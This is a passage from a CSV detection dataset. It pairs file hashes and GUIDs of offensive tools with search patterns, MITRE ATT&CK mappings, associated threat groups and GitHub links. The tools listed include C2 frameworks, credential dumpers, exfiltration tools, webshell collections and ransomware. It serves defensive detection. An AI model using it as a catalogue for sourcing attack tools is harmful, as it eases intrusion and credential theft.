cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27508" "*5d9056bbe4482693b730e587f475256b0e706c3b4a820368f58084aa7d158e25*",".{0,1000}5d9056bbe4482693b730e587f475256b0e706c3b4a820368f58084aa7d158e25.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27511" "*5d974cc94472018668a57f0ba0e66282466ced01f69445542bba4a4da479e298*",".{0,1000}5d974cc94472018668a57f0ba0e66282466ced01f69445542bba4a4da479e298.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27512" "*5d975e81c68574849bb0fec4c6d2116a4ba7dd58bdd1710463ab75d9a8054bc3*",".{0,1000}5d975e81c68574849bb0fec4c6d2116a4ba7dd58bdd1710463ab75d9a8054bc3.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","#filehash","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","27513" "*5d9b00a706436f93d927799d4dff0f1b53af9a10bf3bfe0c7918595783f3ddf6*",".{0,1000}5d9b00a706436f93d927799d4dff0f1b53af9a10bf3bfe0c7918595783f3ddf6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27514" "*5da0734623d5c9fa77825167f2d7f6b041d48087e5a93156e97135f68e4cce97*",".{0,1000}5da0734623d5c9fa77825167f2d7f6b041d48087e5a93156e97135f68e4cce97.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27515" "*5da47804835b0d8e787353d8660ada4903f9971aafa864d651bf7ccdec3ee16d*",".{0,1000}5da47804835b0d8e787353d8660ada4903f9971aafa864d651bf7ccdec3ee16d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27516" "*5da8e20e1e3a1b63c62d573e8e86316315dffef2b07ca365d0e74552de74b5ed*",".{0,1000}5da8e20e1e3a1b63c62d573e8e86316315dffef2b07ca365d0e74552de74b5ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27517" 
"*5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92*",".{0,1000}5da9049dbb09c0f24ee3732e407eb636230a1f8b8dea5f40e74651102229cd92.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27518" "*5db320e5c5cbbc14478fc1d7c7ae33cfff92877fc585f83a3d7a981a00e9b4f4*",".{0,1000}5db320e5c5cbbc14478fc1d7c7ae33cfff92877fc585f83a3d7a981a00e9b4f4.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27519" "*5db3498c96a63ebbf02ce68726110bdc2111cdd4d8bbd3e75d37e8055e8cb3e7*",".{0,1000}5db3498c96a63ebbf02ce68726110bdc2111cdd4d8bbd3e75d37e8055e8cb3e7.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27520" 
"*5db4c8112942c658a4f14d16fff13781dd705273c0050b2ada09ec79c7cb7c87*",".{0,1000}5db4c8112942c658a4f14d16fff13781dd705273c0050b2ada09ec79c7cb7c87.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#filehash","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","27521" "*5dba56860b0d684c8aa7bd7d872e31b87ecf7a98c1c1a696b537d63a402aaf53*",".{0,1000}5dba56860b0d684c8aa7bd7d872e31b87ecf7a98c1c1a696b537d63a402aaf53.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27523" "*5dc10484e657c478f1740c45b19bb1e46a0edee7c4c89da9977359cce0a4958f*",".{0,1000}5dc10484e657c478f1740c45b19bb1e46a0edee7c4c89da9977359cce0a4958f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27525" "*5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95*",".{0,1000}5dd1488efa5a855d71e3b60d9d398f1fcaae367c352e731ced194c0fa261ac95.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27528" "*5de705eec2460c614edf09cf700176ae09ca862cd8233535b70f2c9d7307a8e0*",".{0,1000}5de705eec2460c614edf09cf700176ae09ca862cd8233535b70f2c9d7307a8e0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27532" "*5de78ea9-73a8-4c53-9d5e-3a893e439a3a*",".{0,1000}5de78ea9\-73a8\-4c53\-9d5e\-3a893e439a3a.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#GUIDproject","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","27533" "*5DE7F97C-B97B-489F-A1E4-9F9656317F94*",".{0,1000}5DE7F97C\-B97B\-489F\-A1E4\-9F9656317F94.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","27534" "*5dec1cfe7c0c2ec55c17fb44b43f7d14*",".{0,1000}5dec1cfe7c0c2ec55c17fb44b43f7d14.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","27535" "*5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0*",".{0,1000}5ded3e0d1d7d2261be33496b0c7e59c8b6604d6cca0f371caa669d3f47eb10f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27536" "*5ded9901c45d1280311766c52ae096dfefb0204b2ac89f415e310097860e8ec1*",".{0,1000}5ded9901c45d1280311766c52ae096dfefb0204b2ac89f415e310097860e8ec1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27537" "*5df2061e118e67da27199797b696b33b0176f35d155b2a1204b4fd11ea6d25bb*",".{0,1000}5df2061e118e67da27199797b696b33b0176f35d155b2a1204b4fd11ea6d25bb.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - 
T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","#filehash","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","27538" "*5df212be068f9aa481bf48ce088445d2740a15cbdc35e31c3953f5aa27660c92*",".{0,1000}5df212be068f9aa481bf48ce088445d2740a15cbdc35e31c3953f5aa27660c92.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27539" "*5df59d3aeb2b438458b5dfe2a8f0bbc15da03a6c222d9cf57aff6df5f682ee31*",".{0,1000}5df59d3aeb2b438458b5dfe2a8f0bbc15da03a6c222d9cf57aff6df5f682ee31.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","0","#filehash","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","27540" "*5dfe5309135b7c12dcadee7bc3631bd4fffb37979dd7495758a68939e89db575*",".{0,1000}5dfe5309135b7c12dcadee7bc3631bd4fffb37979dd7495758a68939e89db575.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27541" "*5e00926cb43b56a330532ce5c4f0988172d49d28840ed490526976a7b2ea2479*",".{0,1000}5e00926cb43b56a330532ce5c4f0988172d49d28840ed490526976a7b2ea2479.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 
certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","0","#filehash","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","27542" "*5e072a48d093df02065faaeee6bbc019e1e6c4ac85ae0b00726c5dc216886bb1*",".{0,1000}5e072a48d093df02065faaeee6bbc019e1e6c4ac85ae0b00726c5dc216886bb1.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","27545" "*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*",".{0,1000}5E0812A9\-C727\-44F3\-A2E3\-8286CDC3ED4F.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","#GUIDproject","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","27546" "*5e1350993991046a366a985916360cf8024f2ecbc6bf595da691226e546b14fd*",".{0,1000}5e1350993991046a366a985916360cf8024f2ecbc6bf595da691226e546b14fd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27548" "*5e155e9adb8422b5b194169e1819096c0877adf8b409a32f287ad82a55add44a*",".{0,1000}5e155e9adb8422b5b194169e1819096c0877adf8b409a32f287ad82a55add44a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27549" "*5e16331a5e5b6bf1c82658272e49d8f28bcac62bd222e08f530ee9062ca16b23*",".{0,1000}5e16331a5e5b6bf1c82658272e49d8f28bcac62bd222e08f530ee9062ca16b23.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27550" "*5e1751b6c6f16bf4b147c3ccbf156e6d5b30ce2f14419a97cefc7b2487abb24f*",".{0,1000}5e1751b6c6f16bf4b147c3ccbf156e6d5b30ce2f14419a97cefc7b2487abb24f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27551" "*5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98*",".{0,1000}5e1896cd6c5bc82e6369f5e143bf87a59b37775c7987d36e29ff1846c4863d98.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27552" "*5e1d5d651348c7b8066cab1d5341b7f38fb8271a7ff6add68876e7f83cbecf63*",".{0,1000}5e1d5d651348c7b8066cab1d5341b7f38fb8271a7ff6add68876e7f83cbecf63.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","27553" "*5e2406b0687127f8980b1d73f475edb5410d6337cdf022a3d8b354c88c64c30b*",".{0,1000}5e2406b0687127f8980b1d73f475edb5410d6337cdf022a3d8b354c88c64c30b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27554" "*5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1*",".{0,1000}5e25477af34314dc8fd4fe2013845ec55572ac213148b70499b928bc4af1f1c1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27555" 
"*5e26c68699b11eafab62369502fbbacd7797327a7f5d5a9b84e632220935d1d0*",".{0,1000}5e26c68699b11eafab62369502fbbacd7797327a7f5d5a9b84e632220935d1d0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27556" "*5e2c017817ac29d2717628ba6fd14b3be13ada1c74afd77ee80c1312a6f5586b*",".{0,1000}5e2c017817ac29d2717628ba6fd14b3be13ada1c74afd77ee80c1312a6f5586b.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","27558" "*5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c*",".{0,1000}5e3261026ae988a6e7d629e1201733ea922d06b37d4d07df2223a1427ea8c63c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27559" "*5e3d3d353d87bb0b41714922c72dc61f16d4bb3f20990ccb9be75b9689e864aa*",".{0,1000}5e3d3d353d87bb0b41714922c72dc61f16d4bb3f20990ccb9be75b9689e864aa.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - 
T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","27561" "*5e438cc32aa2a58190adc379d070d815afd1b03284eb7922b8daed40014ad1ef*",".{0,1000}5e438cc32aa2a58190adc379d070d815afd1b03284eb7922b8daed40014ad1ef.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27563" "*5e4934f815abdfbab50576d3c7d2bd7d192b759c3816ab0089ec3d06bb3c0945*",".{0,1000}5e4934f815abdfbab50576d3c7d2bd7d192b759c3816ab0089ec3d06bb3c0945.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27565" "*5e55e91e64bb5011ac10ce8c1d90a3e9368f0ebdb6b0caa59fff7eed51393cb3*",".{0,1000}5e55e91e64bb5011ac10ce8c1d90a3e9368f0ebdb6b0caa59fff7eed51393cb3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27567" 
"*5e58cd83a2f4613303713489e819e69a42109141e3c998e21bf25906b45eeb30*",".{0,1000}5e58cd83a2f4613303713489e819e69a42109141e3c998e21bf25906b45eeb30.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","27568" "*5e5a0618107570e45d2d2559d13658fb0e08f732*",".{0,1000}5e5a0618107570e45d2d2559d13658fb0e08f732.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27569" "*5e5e21abed5ff9e25cd2ea1c626a1f0ffe6194d1e2c74dfec8aebc0789b2dee1*",".{0,1000}5e5e21abed5ff9e25cd2ea1c626a1f0ffe6194d1e2c74dfec8aebc0789b2dee1.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","27570" "*5e60bc27d24e7a5b641fa59ee55002dae44ce9dde494df9783a9aa002455c6d2*",".{0,1000}5e60bc27d24e7a5b641fa59ee55002dae44ce9dde494df9783a9aa002455c6d2.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner 
(nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","27571" "*5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c*",".{0,1000}5e68b0a2d0424b4afb739ac7938e49ec2e9cb41999346aee22c0284aa1cdcf5c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27572" "*5e6aca1735a130c574685542a7a89b5bab4d4e1bacfe1279ec76189b0bec6fd5*",".{0,1000}5e6aca1735a130c574685542a7a89b5bab4d4e1bacfe1279ec76189b0bec6fd5.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","27573" "*5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686*",".{0,1000}5e6cfa7f3d2e7bf2eadb2d4f197189d43798b3270c39bbe3a2fb99c5684ec686.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27574" "*5e7519bba332d03aaca2ab30275e2afcea4b45abd4204ad3d97054775d55b830*",".{0,1000}5e7519bba332d03aaca2ab30275e2afcea4b45abd4204ad3d97054775d55b830.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 
